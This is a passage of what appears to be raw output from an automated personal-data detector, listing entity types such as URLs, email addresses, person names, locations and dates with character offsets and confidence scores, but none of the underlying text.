4781, end: 4787, score: 0.5, type: URL, start: 4981, end: 4996, score: 0.5, type: URL, start: 5134, end: 5140, score: 0.5, type: URL, start: 5346, end: 5352, score: 0.5, type: URL, start: 5602, end: 5608, score: 0.5, type: URL, start: 5641, end: 5650, score: 0.5, type: URL, start: 5661, end: 5670, score: 0.5, type: URL, start: 5704, end: 5714, score: 0.5, type: URL, start: 5979, end: 5985, score: 0.5, type: URL, start: 6077, end: 6084, score: 0.5, type: URL, start: 6095, end: 6104, score: 0.5, type: URL, start: 6119, end: 6129, score: 0.5, type: URL, start: 6157, end: 6167, score: 0.5, type: URL, start: 6198, end: 6208, score: 0.5, type: URL, start: 6241, end: 6251, score: 0.5, type: URL, start: 6263, end: 6270, score: 0.5, type: URL, start: 6367, end: 6374, score: 0.5, type: URL, start: 6397, end: 6412, score: 0.5, type: EMAIL_ADDRESS, start: 693, end: 708, score: 1.0, type: URL, start: 88, end: 140, score: 0.6, type: IP_ADDRESS, start: 985, end: 986, score: 0.6, type: IP_ADDRESS, start: 1013, end: 1017, score: 0.6, type: URL, start: 183, end: 192, score: 0.5, type: URL, start: 699, end: 708, score: 0.5, type: LOCATION, start: 170, end: 196, score: 0.85, type: IP_ADDRESS, start: 1772, end: 1781, score: 0.6, type: URL, start: 170, end: 176, score: 0.5, type: URL, start: 240, end: 246, score: 0.5, type: URL, start: 298, end: 306, score: 0.5, type: URL, start: 378, end: 384, score: 0.5, type: URL, start: 470, end: 478, score: 0.5, type: URL, start: 517, end: 523, score: 0.5, type: URL, start: 594, end: 600, score: 0.5, type: URL, start: 627, end: 633, score: 0.5, type: URL, start: 706, end: 713, score: 0.5, type: URL, start: 787, end: 793, score: 0.5, type: URL, start: 891, end: 902, score: 0.5, type: URL, start: 951, end: 957, score: 0.5, type: URL, start: 1072, end: 1078, score: 0.5, type: URL, start: 1128, end: 1134, score: 0.5, type: URL, start: 1216, end: 1223, score: 0.5, type: URL, start: 1297, end: 1303, score: 0.5, type: URL, start: 1401, end: 1412, score: 0.5, type: URL, start: 1460, end: 1466, score: 0.5, type: URL, start: 1546, end: 1552, score: 0.5, type: URL, start: 1582, end: 1588, score: 0.5, type: URL, start: 1670, end: 1677, 
score: 0.5, type: URL, start: 1746, end: 1752, score: 0.5, type: PERSON, start: 31, end: 37, score: 0.85, type: NRP, start: 57, end: 64, score: 0.85, type: PERSON, start: 178, end: 182, score: 0.85, type: PERSON, start: 495, end: 504, score: 0.85, type: LOCATION, start: 1165, end: 1174, score: 0.85, type: DATE_TIME, start: 1252, end: 1270, score: 0.85, type: DATE_TIME, start: 1493, end: 1502, score: 0.85, type: DATE_TIME, start: 1528, end: 1530, score: 0.85, type: DATE_TIME, start: 1718, end: 1723, score: 0.85, type: PERSON, start: 2118, end: 2125, score: 0.85, type: DATE_TIME, start: 2165, end: 2169, score: 0.85, type: DATE_TIME, start: 2506, end: 2512, score: 0.85, type: DATE_TIME, start: 2514, end: 2521, score: 0.85, type: LOCATION, start: 2601, end: 2610, score: 0.85, type: DATE_TIME, start: 2785, end: 2790, score: 0.85, type: PERSON, start: 3186, end: 3193, score: 0.85, type: DATE_TIME, start: 3233, end: 3241, score: 0.85, type: PERSON, start: 4019, end: 4028, score: 0.85, type: PERSON, start: 4222, end: 4231, score: 0.85, type: PERSON, start: 4347, end: 4355, score: 0.85, type: DATE_TIME, start: 4961, end: 4965, score: 0.85, type: DATE_TIME, start: 4993, end: 4997, score: 0.85, type: DATE_TIME, start: 5212, end: 5216, score: 0.85, type: DATE_TIME, start: 5231, end: 5235, score: 0.85, type: DATE_TIME, start: 5382, end: 5386, score: 0.85, type: DATE_TIME, start: 5402, end: 5406, score: 0.85, type: LOCATION, start: 5815, end: 5824, score: 0.85, type: LOCATION, start: 5891, end: 5898, score: 0.85, type: LOCATION, start: 6219, end: 6228, score: 0.85, type: LOCATION, start: 6303, end: 6310, score: 0.85, type: LOCATION, start: 6553, end: 6562, score: 0.85, type: LOCATION, start: 6639, end: 6646, score: 0.85, type: LOCATION, start: 7982, end: 7995, score: 0.85, type: LOCATION, start: 8124, end: 8137, score: 0.85, type: LOCATION, start: 8337, end: 8341, score: 0.85, type: URL, start: 228, end: 233, score: 0.5, type: URL, start: 253, end: 258, score: 0.5, type: URL, start: 278, end: 287, score: 0.5, type: URL, start: 322, end: 331, score: 0.5, type: URL, start: 699, end: 704, score: 0.5, type: URL, start: 1747, end: 1754, score: 0.5, type: URL, start: 2225, end: 2235, score: 0.5, type: URL, start: 2326, end: 2336, score: 0.5, type: URL, start: 2489, end: 2494, score: 0.5, type: URL, start: 2537, end: 2549, score: 0.5, type: URL, start: 2814, end: 2821, score: 0.5, type: URL, start: 3284, end: 3294, score: 0.5, type: URL, start: 3437, end: 3442, score: 0.5, type: URL, start: 3459, end: 3464, score: 0.5, type: URL, start: 3489, end: 3500, score: 0.5, type: URL, start: 3824, end: 3830, score: 0.5, type: URL, start: 3847, end: 3853, score: 0.5, type: URL, start: 3881, end: 3889, score: 0.5, type: URL, start: 3901, end: 3907, score: 0.5, type: URL, start: 3951, end: 3956, score: 0.5, type: URL, start: 4097, end: 4110, score: 0.5, type: URL, start: 4165, end: 4174, score: 0.5, type: URL, start: 4347, end: 4352, score: 0.5, type: URL, start: 4527, end: 4539, score: 0.5, type: URL, start: 4549, end: 4555, score: 0.5, type: URL, start: 4583, end: 4589, score: 0.5, type: URL, start: 5617, end: 5627, score: 0.5, type: URL, start: 5705, end: 5712, score: 0.5, type: URL, start: 5716, end: 5726, score: 0.5, type: URL, start: 5974, end: 5984, score: 0.5, type: URL, start: 6052, end: 6062, score: 0.5, type: URL, start: 6108, end: 6115, score: 0.5, type: URL, start: 6119, end: 6129, score: 0.5, type: URL, start: 6343, end: 6353, score: 0.5, type: URL, start: 6442, end: 6449, score: 0.5, type: URL, start: 6453, 
end: 6463, score: 0.5, type: URL, start: 6702, end: 6707, score: 0.5, type: URL, start: 7112, end: 7117, score: 0.5, type: URL, start: 7526, end: 7531, score: 0.5, type: URL, start: 7612, end: 7622, score: 0.5, type: URL, start: 7691, end: 7696, score: 0.5, type: URL, start: 7727, end: 7732, score: 0.5, type: URL, start: 7916, end: 7926, score: 0.5, type: URL, start: 8055, end: 8065, score: 0.5, type: URL, start: 8172, end: 8178, score: 0.5, type: URL, start: 8217, end: 8223, score: 0.5, type: URL, start: 8535, end: 8542, score: 0.5, type: URL, start: 8546, end: 8556, score: 0.5, type: URL, start: 8641, end: 8648, score: 0.5, type: URL, start: 8652, end: 8662, score: 0.5, type: URL, start: 8736, end: 8741, score: 0.5, type: URL, start: 8824, end: 8829, score: 0.5, type: EMAIL_ADDRESS, start: 32, end: 47, score: 1.0, type: DATE_TIME, start: 16, end: 20, score: 0.85, type: LOCATION, start: 21, end: 31, score: 0.85, type: LOCATION, start: 916, end: 923, score: 0.85, type: PERSON, start: 946, end: 953, score: 0.85, type: PERSON, start: 2252, end: 2267, score: 0.85, type: PERSON, start: 2274, end: 2280, score: 0.85, type: URL, start: 38, end: 47, score: 0.5, type: URL, start: 1460, end: 1467, score: 0.5, type: URL, start: 1501, end: 1508, score: 0.5, type: URL, start: 1756, end: 1760, score: 0.5, type: URL, start: 2103, end: 2108, score: 0.5, type: URL, start: 2252, end: 2263, score: 0.5, type: URL, start: 2344, end: 2355, score: 0.5, type: URL, start: 2407, end: 2418, score: 0.5, type: URL, start: 2441, end: 2451, score: 0.5, type: URL, start: 2480, end: 2491, score: 0.5, type: URL, start: 2543, end: 2548, score: 0.5, type: EMAIL_ADDRESS, start: 119, end: 134, score: 1.0, type: DATE_TIME, start: 101, end: 105, score: 0.85, type: PERSON, start: 106, end: 118, score: 0.85, type: LOCATION, start: 2390, end: 2422, score: 0.85, type: PERSON, start: 3074, end: 3083, score: 0.85, type: LOCATION, start: 3478, end: 3493, score: 0.85, type: NRP, start: 3734, end: 3758, score: 0.85, type: PERSON, start: 3806, end: 3833, score: 0.85, type: NRP, start: 3879, end: 3888, score: 0.85, type: LOCATION, start: 4015, end: 4030, score: 0.85, type: NRP, start: 4258, end: 4282, score: 0.85, type: PERSON, start: 4328, end: 4353, score: 0.85, type: PERSON, start: 5357, end: 5383, score: 0.85, type: PERSON, start: 5561, end: 5575, score: 0.85, type: PERSON, start: 6479, end: 6514, score: 0.85, type: PERSON, start: 7800, end: 7835, score: 0.85, type: LOCATION, start: 8190, end: 8195, score: 0.85, type: PERSON, start: 8573, end: 8614, score: 0.85, type: URL, start: 726, end: 754, score: 0.6, type: URL, start: 125, end: 134, score: 0.5, type: URL, start: 818, end: 828, score: 0.5, type: URL, start: 952, end: 960, score: 0.5, type: URL, start: 1000, end: 1008, score: 0.5, type: URL, start: 1110, end: 1118, score: 0.5, type: URL, start: 1240, end: 1250, score: 0.5, type: URL, start: 1652, end: 1661, score: 0.5, type: URL, start: 1839, end: 1845, score: 0.5, type: URL, start: 1854, end: 1861, score: 0.5, type: URL, start: 1924, end: 1931, score: 0.5, type: URL, start: 1940, end: 1946, score: 0.5, type: URL, start: 2265, end: 2276, score: 0.5, type: URL, start: 2500, end: 2509, score: 0.5, type: URL, start: 2695, end: 2702, score: 0.5, type: URL, start: 2763, end: 2770, score: 0.5, type: URL, start: 3036, end: 3044, score: 0.5, type: URL, start: 3047, end: 3060, score: 0.5, type: URL, start: 3177, end: 3192, score: 0.5, type: URL, start: 3651, end: 3661, score: 0.5, type: URL, start: 3734, end: 3745, score: 0.5, type: URL, 
start: 3992, end: 3999, score: 0.5, type: URL, start: 4181, end: 4189, score: 0.5, type: URL, start: 4258, end: 4269, score: 0.5, type: URL, start: 4511, end: 4520, score: 0.5, type: URL, start: 4702, end: 4709, score: 0.5, type: URL, start: 4758, end: 4781, score: 0.5, type: URL, start: 4937, end: 4946, score: 0.5, type: URL, start: 4975, end: 4983, score: 0.5, type: URL, start: 5017, end: 5028, score: 0.5, type: URL, start: 5205, end: 5224, score: 0.5, type: URL, start: 5313, end: 5319, score: 0.5, type: URL, start: 5357, end: 5376, score: 0.5, type: URL, start: 5492, end: 5499, score: 0.5, type: URL, start: 5518, end: 5533, score: 0.5, type: URL, start: 5561, end: 5568, score: 0.5, type: URL, start: 5587, end: 5593, score: 0.5, type: URL, start: 5671, end: 5679, score: 0.5, type: URL, start: 5682, end: 5695, score: 0.5, type: URL, start: 5710, end: 5718, score: 0.5, type: URL, start: 5868, end: 5876, score: 0.5, type: URL, start: 5937, end: 5945, score: 0.5, type: URL, start: 6001, end: 6007, score: 0.5, type: URL, start: 6074, end: 6079, score: 0.5, type: URL, start: 6177, end: 6194, score: 0.5, type: URL, start: 6257, end: 6265, score: 0.5, type: URL, start: 6268, end: 6281, score: 0.5, type: URL, start: 6372, end: 6389, score: 0.5, type: URL, start: 6425, end: 6431, score: 0.5, type: URL, start: 6687, end: 6704, score: 0.5, type: URL, start: 6731, end: 6737, score: 0.5, type: URL, start: 6781, end: 6797, score: 0.5, type: URL, start: 6840, end: 6846, score: 0.5, type: URL, start: 6881, end: 6897, score: 0.5, type: URL, start: 6923, end: 6939, score: 0.5, type: URL, start: 6942, end: 6959, score: 0.5, type: URL, start: 7062, end: 7069, score: 0.5, type: URL, start: 7134, end: 7159, score: 0.5, type: URL, start: 7174, end: 7197, score: 0.5, type: URL, start: 7375, end: 7388, score: 0.5, type: URL, start: 7540, end: 7548, score: 0.5, type: URL, start: 7705, end: 7711, score: 0.5, type: URL, start: 7800, end: 7808, score: 0.5, type: URL, start: 7811, end: 7824, score: 0.5, type: URL, start: 8160, end: 8165, score: 0.5, type: URL, start: 8190, end: 8198, score: 0.5, type: URL, start: 8219, end: 8224, score: 0.5, type: URL, start: 8269, end: 8281, score: 0.5, type: URL, start: 8315, end: 8329, score: 0.5, type: URL, start: 8364, end: 8379, score: 0.5, type: URL, start: 8407, end: 8419, score: 0.5, type: URL, start: 8459, end: 8480, score: 0.5, type: URL, start: 8507, end: 8515, score: 0.5, type: URL, start: 8573, end: 8592, score: 0.5, type: EMAIL_ADDRESS, start: 171, end: 186, score: 1.0, type: PERSON, start: 159, end: 186, score: 0.85, type: LOCATION, start: 698, end: 706, score: 0.85, type: PERSON, start: 1509, end: 1517, score: 0.85, type: PERSON, start: 1653, end: 1659, score: 0.85, type: PERSON, start: 2046, end: 2057, score: 0.85, type: LOCATION, start: 2530, end: 2565, score: 0.85, type: PERSON, start: 2777, end: 2805, score: 0.85, type: PERSON, start: 3382, end: 3386, score: 0.85, type: URL, start: 59, end: 70, score: 0.5, type: URL, start: 177, end: 186, score: 0.5, type: URL, start: 205, end: 216, score: 0.5, type: URL, start: 369, end: 375, score: 0.5, type: URL, start: 698, end: 704, score: 0.5, type: URL, start: 716, end: 727, score: 0.5, type: URL, start: 749, end: 755, score: 0.5, type: URL, start: 771, end: 777, score: 0.5, type: URL, start: 791, end: 797, score: 0.5, type: URL, start: 843, end: 849, score: 0.5, type: URL, start: 862, end: 868, score: 0.5, type: URL, start: 884, end: 895, score: 0.5, type: URL, start: 928, end: 938, score: 0.5, type: URL, start: 991, end: 
1001, score: 0.5, type: URL, start: 1857, end: 1865, score: 0.5, type: URL, start: 2337, end: 2348, score: 0.5, type: URL, start: 2568, end: 2579, score: 0.5, type: URL, start: 2922, end: 2929, score: 0.5, type: URL, start: 3134, end: 3141, score: 0.5, type: URL, start: 3191, end: 3198, score: 0.5, type: URL, start: 3324, end: 3334, score: 0.5, type: URL, start: 3411, end: 3425, score: 0.5, type: URL, start: 3471, end: 3475, score: 0.5, type: URL, start: 3485, end: 3492, score: 0.5, type: URL, start: 3593, end: 3602, score: 0.5, type: URL, start: 3721, end: 3728, score: 0.5, type: URL, start: 3891, end: 3899, score: 0.5, type: URL, start: 3961, end: 3967, score: 0.5, type: URL, start: 4020, end: 4027, score: 0.5, type: URL, start: 4090, end: 4100, score: 0.5, type: URL, start: 4237, end: 4244, score: 0.5, type: URL, start: 4349, end: 4359, score: 0.5, type: URL, start: 4436, end: 4446, score: 0.5, type: URL, start: 4460, end: 4464, score: 0.5, type: URL, start: 4489, end: 4493, score: 0.5, type: URL, start: 4528, end: 4538, score: 0.5, type: URL, start: 4576, end: 4586, score: 0.5, type: URL, start: 4646, end: 4650, score: 0.5, type: LOCATION, start: 516, end: 525, score: 0.85, type: LOCATION, start: 694, end: 698, score: 0.85, type: DATE_TIME, start: 1763, end: 1773, score: 0.85, type: LOCATION, start: 2717, end: 2731, score: 0.85, type: PERSON, start: 5462, end: 5481, score: 0.85, type: PERSON, start: 5531, end: 5546, score: 0.85, type: LOCATION, start: 5555, end: 5571, score: 0.85, type: NRP, start: 5642, end: 5658, score: 0.85, type: PERSON, start: 6871, end: 6877, score: 0.85, type: LOCATION, start: 7297, end: 7303, score: 0.85, type: LOCATION, start: 7305, end: 7311, score: 0.85, type: IP_ADDRESS, start: 1164, end: 1169, score: 0.6, type: URL, start: 192, end: 203, score: 0.5, type: URL, start: 280, end: 286, score: 0.5, type: URL, start: 324, end: 329, score: 0.5, type: URL, start: 354, end: 360, score: 0.5, type: URL, start: 376, end: 382, score: 0.5, type: URL, start: 481, end: 487, score: 0.5, type: URL, start: 502, end: 508, score: 0.5, type: URL, start: 537, end: 543, score: 0.5, type: URL, start: 1023, end: 1041, score: 0.5, type: URL, start: 1101, end: 1108, score: 0.5, type: URL, start: 1206, end: 1211, score: 0.5, type: URL, start: 1302, end: 1307, score: 0.5, type: URL, start: 1471, end: 1489, score: 0.5, type: URL, start: 1549, end: 1556, score: 0.5, type: URL, start: 1618, end: 1622, score: 0.5, type: URL, start: 1665, end: 1669, score: 0.5, type: URL, start: 1714, end: 1718, score: 0.5, type: URL, start: 1851, end: 1855, score: 0.5, type: URL, start: 1904, end: 1908, score: 0.5, type: URL, start: 1951, end: 1955, score: 0.5, type: URL, start: 1999, end: 2003, score: 0.5, type: URL, start: 2045, end: 2049, score: 0.5, type: URL, start: 2137, end: 2141, score: 0.5, type: URL, start: 2180, end: 2184, score: 0.5, type: URL, start: 2230, end: 2234, score: 0.5, type: URL, start: 2321, end: 2325, score: 0.5, type: URL, start: 2371, end: 2375, score: 0.5, type: URL, start: 2422, end: 2426, score: 0.5, type: URL, start: 2514, end: 2518, score: 0.5, type: URL, start: 2564, end: 2568, score: 0.5, type: URL, start: 2717, end: 2721, score: 0.5, type: URL, start: 2766, end: 2770, score: 0.5, type: URL, start: 2815, end: 2819, score: 0.5, type: URL, start: 2914, end: 2918, score: 0.5, type: URL, start: 3011, end: 3015, score: 0.5, type: URL, start: 3223, end: 3228, score: 0.5, type: URL, start: 3342, end: 3352, score: 0.5, type: URL, start: 3431, end: 3449, score: 0.5, type: URL, 
start: 3510, end: 3517, score: 0.5, type: URL, start: 3578, end: 3584, score: 0.5, type: URL, start: 3641, end: 3647, score: 0.5, type: URL, start: 3664, end: 3670, score: 0.5, type: URL, start: 3726, end: 3732, score: 0.5, type: URL, start: 3751, end: 3757, score: 0.5, type: URL, start: 3813, end: 3819, score: 0.5, type: URL, start: 4001, end: 4007, score: 0.5, type: URL, start: 4063, end: 4069, score: 0.5, type: URL, start: 4092, end: 4098, score: 0.5, type: URL, start: 4154, end: 4160, score: 0.5, type: URL, start: 4177, end: 4183, score: 0.5, type: URL, start: 4238, end: 4244, score: 0.5, type: URL, start: 4262, end: 4268, score: 0.5, type: URL, start: 4324, end: 4330, score: 0.5, type: URL, start: 4346, end: 4352, score: 0.5, type: URL, start: 4406, end: 4412, score: 0.5, type: URL, start: 4513, end: 4519, score: 0.5, type: URL, start: 4573, end: 4579, score: 0.5, type: URL, start: 4592, end: 4598, score: 0.5, type: URL, start: 4658, end: 4664, score: 0.5, type: URL, start: 4684, end: 4690, score: 0.5, type: URL, start: 4744, end: 4750, score: 0.5, type: URL, start: 4850, end: 4856, score: 0.5, type: URL, start: 4912, end: 4918, score: 0.5, type: URL, start: 4938, end: 4944, score: 0.5, type: URL, start: 5001, end: 5007, score: 0.5, type: URL, start: 5028, end: 5034, score: 0.5, type: URL, start: 5090, end: 5096, score: 0.5, type: URL, start: 5196, end: 5202, score: 0.5, type: URL, start: 5257, end: 5263, score: 0.5, type: URL, start: 5283, end: 5289, score: 0.5, type: URL, start: 5347, end: 5353, score: 0.5, type: URL, start: 5555, end: 5561, score: 0.5, type: URL, start: 5617, end: 5623, score: 0.5, type: URL, start: 5642, end: 5648, score: 0.5, type: URL, start: 5706, end: 5712, score: 0.5, type: URL, start: 5731, end: 5737, score: 0.5, type: URL, start: 5795, end: 5801, score: 0.5, type: URL, start: 5910, end: 5916, score: 0.5, type: URL, start: 5972, end: 5978, score: 0.5, type: URL, start: 6083, end: 6089, score: 0.5, type: URL, start: 6145, end: 6151, score: 0.5, type: URL, start: 6422, end: 6428, score: 0.5, type: URL, start: 6448, end: 6454, score: 0.5, type: URL, start: 6472, end: 6478, score: 0.5, type: URL, start: 6498, end: 6504, score: 0.5, type: URL, start: 6517, end: 6523, score: 0.5, type: URL, start: 6551, end: 6556, score: 0.5, type: URL, start: 6766, end: 6776, score: 0.5, type: URL, start: 6806, end: 6816, score: 0.5, type: URL, start: 6855, end: 6865, score: 0.5, type: URL, start: 6904, end: 6914, score: 0.5, type: URL, start: 6944, end: 6960, score: 0.5, type: URL, start: 7099, end: 7110, score: 0.5, type: URL, start: 7230, end: 7235, score: 0.5, type: URL, start: 7255, end: 7260, score: 0.5, type: URL, start: 7319, end: 7324, score: 0.5, type: URL, start: 7458, end: 7463, score: 0.5, type: URL, start: 7565, end: 7570, score: 0.5, type: EMAIL_ADDRESS, start: 254, end: 269, score: 1.0, type: DATE_TIME, start: 36, end: 40, score: 0.85, type: PERSON, start: 242, end: 252, score: 0.85, type: PERSON, start: 424, end: 433, score: 0.85, type: PERSON, start: 753, end: 757, score: 0.85, type: PERSON, start: 3366, end: 3406, score: 0.85, type: PERSON, start: 3432, end: 3450, score: 0.85, type: PERSON, start: 3457, end: 3464, score: 0.85, type: PERSON, start: 3666, end: 3695, score: 0.85, type: PERSON, start: 5612, end: 5620, score: 0.85, type: LOCATION, start: 6678, end: 6683, score: 0.85, type: DATE_TIME, start: 7090, end: 7099, score: 0.85, type: URL, start: 260, end: 269, score: 0.5, type: URL, start: 1948, end: 1955, score: 0.5, type: URL, start: 2220, end: 2227, 
score: 0.5, type: URL, start: 3107, end: 3120, score: 0.5, type: URL, start: 3341, end: 3353, score: 0.5, type: URL, start: 3440, end: 3445, score: 0.5, type: URL, start: 4086, end: 4093, score: 0.5, type: URL, start: 4228, end: 4248, score: 0.5, type: URL, start: 4622, end: 4631, score: 0.5, type: URL, start: 4636, end: 4642, score: 0.5, type: URL, start: 4696, end: 4705, score: 0.5, type: URL, start: 4731, end: 4742, score: 0.5, type: URL, start: 5338, end: 5349, score: 0.5, type: URL, start: 5468, end: 5473, score: 0.5, type: URL, start: 5573, end: 5577, score: 0.5, type: URL, start: 5595, end: 5599, score: 0.5, type: URL, start: 5649, end: 5654, score: 0.5, type: URL, start: 5718, end: 5730, score: 0.5, type: URL, start: 5821, end: 5832, score: 0.5, type: URL, start: 6403, end: 6415, score: 0.5, type: URL, start: 6479, end: 6483, score: 0.5, type: URL, start: 6505, end: 6509, score: 0.5, type: URL, start: 6809, end: 6821, score: 0.5, type: URL, start: 6847, end: 6854, score: 0.5, type: URL, start: 6901, end: 6908, score: 0.5, type: URL, start: 7069, end: 7076, score: 0.5, type: URL, start: 7351, end: 7363, score: 0.5, type: URL, start: 7413, end: 7417, score: 0.5, type: URL, start: 7450, end: 7454, score: 0.5, type: URL, start: 7784, end: 7791, score: 0.5, type: URL, start: 7813, end: 7825, score: 0.5, type: URL, start: 7841, end: 7848, score: 0.5, type: DATE_TIME, start: 34, end: 38, score: 0.85, type: PERSON, start: 686, end: 704, score: 0.85, type: DATE_TIME, start: 2513, end: 2540, score: 0.85, type: DATE_TIME, start: 2540, end: 2552, score: 0.85, type: PERSON, start: 4859, end: 4915, score: 0.85, type: URL, start: 4904, end: 4911, score: 0.85, type: LOCATION, start: 8315, end: 8328, score: 0.85, type: LOCATION, start: 9160, end: 9173, score: 0.85, type: PERSON, start: 9776, end: 9831, score: 0.85, type: LOCATION, start: 10113, end: 10168, score: 0.85, type: URL, start: 106, end: 146, score: 0.6, type: URL, start: 3970, end: 3991, score: 0.6, type: URL, start: 2084, end: 2098, score: 0.5, type: URL, start: 4016, end: 4026, score: 0.5, type: URL, start: 4031, end: 4039, score: 0.5, type: URL, start: 4077, end: 4087, score: 0.5, type: URL, start: 4092, end: 4100, score: 0.5, type: URL, start: 4144, end: 4154, score: 0.5, type: URL, start: 4159, end: 4167, score: 0.5, type: URL, start: 4206, end: 4216, score: 0.5, type: URL, start: 4221, end: 4229, score: 0.5, type: URL, start: 4268, end: 4278, score: 0.5, type: URL, start: 4283, end: 4295, score: 0.5, type: URL, start: 4327, end: 4337, score: 0.5, type: URL, start: 4342, end: 4354, score: 0.5, type: URL, start: 4732, end: 4739, score: 0.5, type: URL, start: 4761, end: 4768, score: 0.5, type: URL, start: 4937, end: 4944, score: 0.5, type: URL, start: 4962, end: 4969, score: 0.5, type: URL, start: 5182, end: 5189, score: 0.5, type: URL, start: 5296, end: 5310, score: 0.5, type: URL, start: 5637, end: 5644, score: 0.5, type: URL, start: 5907, end: 5911, score: 0.5, type: URL, start: 5956, end: 5963, score: 0.5, type: URL, start: 6216, end: 6223, score: 0.5, type: URL, start: 6486, end: 6500, score: 0.5, type: URL, start: 6562, end: 6574, score: 0.5, type: URL, start: 6808, end: 6815, score: 0.5, type: URL, start: 7048, end: 7062, score: 0.5, type: URL, start: 7165, end: 7180, score: 0.5, type: URL, start: 7300, end: 7307, score: 0.5, type: URL, start: 7784, end: 7791, score: 0.5, type: URL, start: 8033, end: 8040, score: 0.5, type: URL, start: 8203, end: 8209, score: 0.5, type: URL, start: 8348, end: 8355, score: 0.5, type: URL, start: 
8870, end: 8890, score: 0.5, type: URL, start: 8972, end: 8979, score: 0.5, type: URL, start: 9193, end: 9200, score: 0.5, type: URL, start: 9795, end: 9811, score: 0.5, type: URL, start: 9855, end: 9871, score: 0.5, type: URL, start: 9904, end: 9920, score: 0.5, type: URL, start: 9950, end: 9966, score: 0.5, type: URL, start: 10035, end: 10041, score: 0.5, type: URL, start: 10124, end: 10130, score: 0.5, type: URL, start: 10301, end: 10307, score: 0.5, type: EMAIL_ADDRESS, start: 101, end: 116, score: 1.0, type: EMAIL_ADDRESS, start: 161, end: 176, score: 1.0, type: DATE_TIME, start: 65, end: 69, score: 0.85, type: PERSON, start: 70, end: 99, score: 0.85, type: PERSON, start: 145, end: 159, score: 0.85, type: PERSON, start: 849, end: 860, score: 0.85, type: LOCATION, start: 875, end: 881, score: 0.85, type: LOCATION, start: 899, end: 902, score: 0.85, type: PERSON, start: 1849, end: 1855, score: 0.85, type: PERSON, start: 2359, end: 2370, score: 0.85, type: PERSON, start: 2452, end: 2460, score: 0.85, type: PERSON, start: 2465, end: 2471, score: 0.85, type: LOCATION, start: 3115, end: 3129, score: 0.85, type: URL, start: 911, end: 960, score: 0.6, type: IP_ADDRESS, start: 2112, end: 2126, score: 0.6, type: IP_ADDRESS, start: 2213, end: 2230, score: 0.6, type: URL, start: 107, end: 116, score: 0.5, type: URL, start: 167, end: 176, score: 0.5, type: EMAIL_ADDRESS, start: 2284, end: 2299, score: 1.0, type: EMAIL_ADDRESS, start: 4126, end: 4141, score: 1.0, type: EMAIL_ADDRESS, start: 8206, end: 8221, score: 1.0, type: EMAIL_ADDRESS, start: 20061, end: 20076, score: 1.0, type: EMAIL_ADDRESS, start: 23476, end: 23491, score: 1.0, type: EMAIL_ADDRESS, start: 24859, end: 24874, score: 1.0, type: EMAIL_ADDRESS, start: 25218, end: 25233, score: 1.0, type: EMAIL_ADDRESS, start: 25902, end: 25917, score: 1.0, type: EMAIL_ADDRESS, start: 26258, end: 26273, score: 1.0, type: EMAIL_ADDRESS, start: 26948, end: 26963, score: 1.0, type: EMAIL_ADDRESS, start: 27304, end: 27319, score: 1.0, type: EMAIL_ADDRESS, start: 27739, end: 27754, score: 1.0, type: EMAIL_ADDRESS, start: 27988, end: 28003, score: 1.0, type: EMAIL_ADDRESS, start: 28166, end: 28181, score: 1.0, type: MEDICAL_LICENSE, start: 28751, end: 28760, score: 1.0, type: EMAIL_ADDRESS, start: 29431, end: 29446, score: 1.0, type: EMAIL_ADDRESS, start: 30926, end: 30941, score: 1.0, type: EMAIL_ADDRESS, start: 30942, end: 30957, score: 1.0, type: EMAIL_ADDRESS, start: 31571, end: 31586, score: 1.0, type: EMAIL_ADDRESS, start: 31587, end: 31602, score: 1.0, type: EMAIL_ADDRESS, start: 33487, end: 33502, score: 1.0, type: EMAIL_ADDRESS, start: 33503, end: 33518, score: 1.0, type: EMAIL_ADDRESS, start: 35382, end: 35397, score: 1.0, type: EMAIL_ADDRESS, start: 35398, end: 35413, score: 1.0, type: DATE_TIME, start: 22785, end: 22795, score: 0.95, type: URL, start: 24581, end: 24616, score: 0.95, type: URL, start: 25275, end: 25289, score: 0.95, type: URL, start: 25624, end: 25659, score: 0.95, type: URL, start: 26315, end: 26329, score: 0.95, type: URL, start: 26636, end: 26671, score: 0.95, type: URL, start: 27361, end: 27375, score: 0.95, type: URL, start: 28660, end: 28728, score: 0.95, type: URL, start: 28816, end: 28874, score: 0.95, type: DATE_TIME, start: 1345, end: 1356, score: 0.85, type: PERSON, start: 1931, end: 1945, score: 0.85, type: LOCATION, start: 2673, end: 2693, score: 0.85, type: PERSON, start: 3470, end: 3480, score: 0.85, type: PERSON, start: 4356, end: 4367, score: 0.85, type: PERSON, start: 5194, end: 5251, score: 0.85, type: 
PERSON, start: 5774, end: 5831, score: 0.85, type: DATE_TIME, start: 6175, end: 6183, score: 0.85, type: PERSON, start: 8110, end: 8118, score: 0.85, type: DATE_TIME, start: 8192, end: 8200, score: 0.85, type: PERSON, start: 10342, end: 10358, score: 0.85, type: PERSON, start: 13248, end: 13258, score: 0.85, type: PERSON, start: 13392, end: 13410, score: 0.85, type: LOCATION, start: 13641, end: 13663, score: 0.85, type: LOCATION, start: 14441, end: 14460, score: 0.85, type: PERSON, start: 15411, end: 15457, score: 0.85, type: PERSON, start: 16181, end: 16199, score: 0.85, type: PERSON, start: 16386, end: 16397, score: 0.85, type: LOCATION, start: 16558, end: 16580, score: 0.85, type: PERSON, start: 17013, end: 17026, score: 0.85, type: PERSON, start: 19462, end: 19477, score: 0.85, type: LOCATION, start: 20510, end: 20524, score: 0.85, type: LOCATION, start: 22798, end: 22815, score: 0.85, type: LOCATION, start: 23464, end: 23474, score: 0.85, type: DATE_TIME, start: 24710, end: 24735, score: 0.85, type: DATE_TIME, start: 25753, end: 25778, score: 0.85, type: DATE_TIME, start: 26765, end: 26790, score: 0.85, type: DATE_TIME, start: 28397, end: 28425, score: 0.85, type: URL, start: 28743, end: 28773, score: 0.85, type: PERSON, start: 29749, end: 29782, score: 0.85, type: DATE_TIME, start: 31334, end: 31343, score: 0.85, type: PERSON, start: 31349, end: 31376, score: 0.85, type: LOCATION, start: 33809, end: 33824, score: 0.85, type: LOCATION, start: 33826, end: 33834, score: 0.85, type: LOCATION, start: 33950, end: 33970, score: 0.85, type: LOCATION, start: 34535, end: 34555, score: 0.85, type: LOCATION, start: 34707, end: 34727, score: 0.85, type: LOCATION, start: 35075, end: 35083, score: 0.85, type: DATE_TIME, start: 35694, end: 35703, score: 0.85, type: DATE_TIME, start: 36375, end: 36384, score: 0.85, type: PERSON, start: 37269, end: 37283, score: 0.85, type: NRP, start: 37875, end: 37887, score: 0.85, type: PERSON, start: 40062, end: 40087, score: 0.85, type: LOCATION, start: 40239, end: 40262, score: 0.85, type: URL, start: 14368, end: 14389, score: 0.6, type: URL, start: 14898, end: 14919, score: 0.6, type: 